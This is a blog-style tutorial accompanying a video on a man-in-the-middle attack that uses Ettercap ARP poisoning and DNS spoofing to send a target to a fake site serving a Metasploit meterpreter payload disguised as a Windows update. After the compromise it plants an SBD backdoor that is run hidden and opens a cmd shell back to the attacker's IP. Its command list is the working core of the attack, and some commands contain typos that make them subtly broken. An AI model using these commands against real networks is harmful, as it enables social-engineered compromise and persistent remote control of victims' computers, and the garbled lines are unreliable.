Man in the Middle (Ettercap, Metasploit, SBD)

By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/MITM_(Ettercap).mp4

Method

  • Ettercap to do the MITM Attack
  • Metasploit for the exploit
  • Secure BackDoor (SBD) for the backdoor
  • Apache for the web server

Tools

  • Ettercap
  • Metasploit
  • A web server
  • SBD (optional)

All of this is on backtrack 4.

Network Setup

Attackers IP: 192.168.1.104

Targets IP: 192.168.1.101

Gateway IP: 192.168.1.1

Software

Name: Ettercap

Version: 0.7.3

Home Page: http://ettercap.sourceforge.net/

Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download

Name: Metasploit

Version: 3.3

Home Page: http://www.metasploit.com/

Download Link: hxxp://spool.metasploit.com/releases/framework-3.2.tar.gz

Name: SBD

Version: 1.36

Home Page: http://tigerteam.se/ (source: http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=sbd)

Download Link: http://packetstormsecurity.org/UNIX/netcat/sbd-1.36.tar.gz

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/pentest/exploits/framework3/msfpayload/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB183905-x86-ENU.exe
kate /var/www/index.html
>*Relace filename with new one, Windows-KB183905-x86-ENU.exe*
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcper
SET LHOAT 192.168.1.104
exploit

cd /usr/share/ettercap/mv -f etter.dns etter.dns.old
kate etter.dns
> * A 192.168.1.104
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /192.168.1.1/ /192.168.1.101/

upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"

wine /root/tools/backdoors/sbd-1.36/sbd.exe -l -k g0tmi1k -p 7332

Notes

  • Sorry for the poor video editing on this one - it is cut from a final video called "g0tmi1k's home network" which is still incomplete.

Song: Mr. Scruff - Is He Ready & Mr. Scruff - Get a Move On

Video length: 06:57

Capture length: 7:40

Blog Post: https://blog.g0tmi1k.com/2009/07/man-in-middle/